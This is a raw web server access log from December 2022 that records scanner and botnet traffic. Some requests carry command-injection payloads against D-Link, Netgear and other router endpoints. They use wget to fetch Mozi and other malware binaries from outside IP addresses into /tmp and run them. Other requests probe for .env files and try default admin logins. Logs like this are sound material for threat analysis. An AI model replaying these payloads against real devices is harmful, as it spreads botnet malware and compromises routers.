64.62.197.35 - - [05/Dec/2022:04:34:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
92.118.39.78 - - [05/Dec/2022:04:35:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
148.153.45.236 - - [05/Dec/2022:04:37:16 +0100] "GET /qD7p HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.236 - - [05/Dec/2022:04:37:16 +0100] "GET /DJlc HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.236 - - [05/Dec/2022:04:37:16 +0100] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.236 - - [05/Dec/2022:04:37:17 +0100] "GET /jquery-3.3.1.slim.min.js HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.236 - - [05/Dec/2022:04:37:17 +0100] "GET /aab9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.236 - - [05/Dec/2022:04:37:17 +0100] "GET /jquery-3.3.2.slim.min.js HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
64.62.197.40 - - [05/Dec/2022:04:37:50 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
109.237.97.180 - - [05/Dec/2022:04:39:11 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.97.180 - - [05/Dec/2022:04:39:11 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
111.20.101.7 - - [05/Dec/2022:04:41:05 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
111.118.40.97 - - [05/Dec/2022:04:45:11 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
186.211.107.250 - - [05/Dec/2022:04:49:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
193.106.29.122 - - [05/Dec/2022:04:49:55 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
27.184.247.30 - - [05/Dec/2022:04:51:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
80.82.78.39 - - [05/Dec/2022:04:52:22 +0100] "\x16\x03\x01" 501 318 "-" "-"
92.118.39.78 - - [05/Dec/2022:04:52:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
194.55.186.124 - - [05/Dec/2022:04:53:31 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
92.118.39.78 - - [05/Dec/2022:04:55:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.78 - - [05/Dec/2022:04:58:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
194.55.186.124 - - [05/Dec/2022:05:00:54 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
118.250.46.86 - - [05/Dec/2022:05:04:31 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
192.241.210.164 - - [05/Dec/2022:05:05:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.210.164 - - [05/Dec/2022:05:05:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
84.21.172.205 - - [05/Dec/2022:05:06:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
192.241.210.164 - - [05/Dec/2022:05:06:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.210.164 - - [05/Dec/2022:05:07:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.210.164 - - [05/Dec/2022:05:08:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.210.164 - - [05/Dec/2022:05:08:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.210.164 - - [05/Dec/2022:05:08:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.210.164 - - [05/Dec/2022:05:10:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
141.255.166.2 - - [05/Dec/2022:05:14:30 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.106.29.122 - - [05/Dec/2022:05:17:58 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
141.255.166.2 - - [05/Dec/2022:05:18:29 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
34.76.96.55 - - [05/Dec/2022:05:21:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
196.188.115.248 - - [05/Dec/2022:05:22:29 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
92.118.39.78 - - [05/Dec/2022:05:23:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.78 - - [05/Dec/2022:05:23:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
141.255.166.2 - - [05/Dec/2022:05:26:26 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
64.62.197.129 - - [05/Dec/2022:05:27:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Edg/106.0.1370.37"
209.141.36.231 - - [05/Dec/2022:05:28:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
209.141.36.231 - - [05/Dec/2022:05:28:18 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
141.255.166.2 - - [05/Dec/2022:05:28:44 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
92.118.39.78 - - [05/Dec/2022:05:29:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
64.62.197.127 - - [05/Dec/2022:05:29:35 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; rv:104.0) Gecko/20100101 Firefox/104.0"
167.172.208.29 - - [05/Dec/2022:05:29:59 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
92.118.39.78 - - [05/Dec/2022:05:30:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
141.255.166.2 - - [05/Dec/2022:05:30:33 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
34.77.127.183 - - [05/Dec/2022:05:30:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
141.255.166.2 - - [05/Dec/2022:05:31:25 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
71.6.232.24 - - [05/Dec/2022:05:31:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
193.106.29.122 - - [05/Dec/2022:05:32:33 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
109.237.97.180 - - [05/Dec/2022:05:34:55 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.97.180 - - [05/Dec/2022:05:34:55 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
34.77.127.183 - - [05/Dec/2022:05:37:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
92.118.39.78 - - [05/Dec/2022:05:38:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
141.255.166.2 - - [05/Dec/2022:05:38:47 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
141.255.166.2 - - [05/Dec/2022:05:38:54 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
35.195.93.98 - - [05/Dec/2022:05:39:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
193.106.29.122 - - [05/Dec/2022:05:43:29 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
141.255.166.2 - - [05/Dec/2022:05:44:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
34.78.6.216 - - [05/Dec/2022:05:45:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
120.86.236.112 - - [05/Dec/2022:05:45:46 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
141.255.166.2 - - [05/Dec/2022:05:47:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
141.255.166.2 - - [05/Dec/2022:05:47:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
81.157.1.64 - - [05/Dec/2022:05:50:34 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
141.255.166.2 - - [05/Dec/2022:05:51:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
193.106.29.122 - - [05/Dec/2022:05:51:45 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
94.102.49.193 - - [05/Dec/2022:05:54:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
94.102.49.193 - - [05/Dec/2022:05:54:18 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
94.102.49.193 - - [05/Dec/2022:05:54:18 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
94.102.49.193 - - [05/Dec/2022:05:54:18 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
94.102.49.193 - - [05/Dec/2022:05:54:20 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
141.255.166.2 - - [05/Dec/2022:05:55:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
141.255.166.2 - - [05/Dec/2022:05:55:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
141.255.166.2 - - [05/Dec/2022:05:57:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
193.47.61.149 - - [05/Dec/2022:05:58:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
141.255.166.2 - - [05/Dec/2022:06:02:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
193.47.61.149 - - [05/Dec/2022:06:03:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
173.214.175.178 - - [05/Dec/2022:06:11:23 +0100] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
81.157.1.64 - - [05/Dec/2022:06:13:17 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
141.255.166.2 - - [05/Dec/2022:06:13:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
141.255.166.2 - - [05/Dec/2022:06:18:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
193.47.61.149 - - [05/Dec/2022:06:22:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
51.254.59.113 - - [05/Dec/2022:06:22:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
184.105.247.195 - - [05/Dec/2022:06:22:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
161.35.14.145 - - [05/Dec/2022:06:24:24 +0100] "\x16\x03\x01" 501 318 "-" "-"
161.35.14.145 - - [05/Dec/2022:06:24:24 +0100] "\x16\x03\x01" 501 318 "-" "-"
161.35.14.145 - - [05/Dec/2022:06:24:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
120.86.253.212 - - [05/Dec/2022:06:27:11 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
184.105.247.231 - - [05/Dec/2022:06:27:28 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.106.29.122 - - [05/Dec/2022:06:29:47 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
59.187.205.166 - - [05/Dec/2022:06:31:07 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
117.201.193.74 - - [05/Dec/2022:06:32:36 +0100] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 324 "-" "-"
4.16.142.230 - - [05/Dec/2022:06:32:56 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.16.142.230 - - [05/Dec/2022:06:32:56 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.16.142.230 - - [05/Dec/2022:06:34:57 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.16.142.230 - - [05/Dec/2022:06:34:57 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
71.196.47.12 - - [05/Dec/2022:06:37:58 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
193.106.29.122 - - [05/Dec/2022:06:40:54 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
193.47.61.149 - - [05/Dec/2022:06:41:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
193.47.61.149 - - [05/Dec/2022:06:42:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
173.214.175.178 - - [05/Dec/2022:06:44:57 +0100] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
193.47.61.149 - - [05/Dec/2022:06:48:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
193.106.29.122 - - [05/Dec/2022:06:49:01 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
103.255.156.42 - - [05/Dec/2022:06:51:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
5.239.167.99 - - [05/Dec/2022:06:57:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
59.89.157.211 - - [05/Dec/2022:07:00:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [05/Dec/2022:07:00:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:01:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
173.214.175.178 - - [05/Dec/2022:07:02:33 +0100] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
212.91.246.72 - - [05/Dec/2022:07:02:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:03:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:04:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
47.88.86.63 - - [05/Dec/2022:07:05:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.88.90.156 - - [05/Dec/2022:07:05:35 +0100] "GET /Public/home/js/check.js HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.88.6.178 - - [05/Dec/2022:07:05:36 +0100] "GET /static/admin/javascript/hetong.js HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
212.91.246.72 - - [05/Dec/2022:07:05:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:06:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
111.92.119.16 - - [05/Dec/2022:07:07:23 +0100] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 324 "-" "-"
212.91.246.72 - - [05/Dec/2022:07:07:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:08:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:09:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:10:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:11:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:12:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:13:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:14:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:15:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:16:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.234 - - [05/Dec/2022:07:17:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 OPR/90.0.4480.84"
212.91.246.72 - - [05/Dec/2022:07:17:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:18:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:19:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.234 - - [05/Dec/2022:07:20:26 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0"
212.91.246.72 - - [05/Dec/2022:07:20:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:21:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:22:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:23:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:24:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:25:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:26:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
59.187.205.166 - - [05/Dec/2022:07:26:53 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [05/Dec/2022:07:27:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:28:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:29:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:30:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:31:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:32:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
173.214.175.178 - - [05/Dec/2022:07:33:18 +0100] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
173.214.175.178 - - [05/Dec/2022:07:33:18 +0100] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
212.91.246.72 - - [05/Dec/2022:07:33:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:34:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:35:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:36:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:37:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:38:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.47.61.149 - - [05/Dec/2022:07:39:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [05/Dec/2022:07:39:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
60.191.125.35 - - [05/Dec/2022:07:40:14 +0100] "HEAD http://112.124.42.80:63435/ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
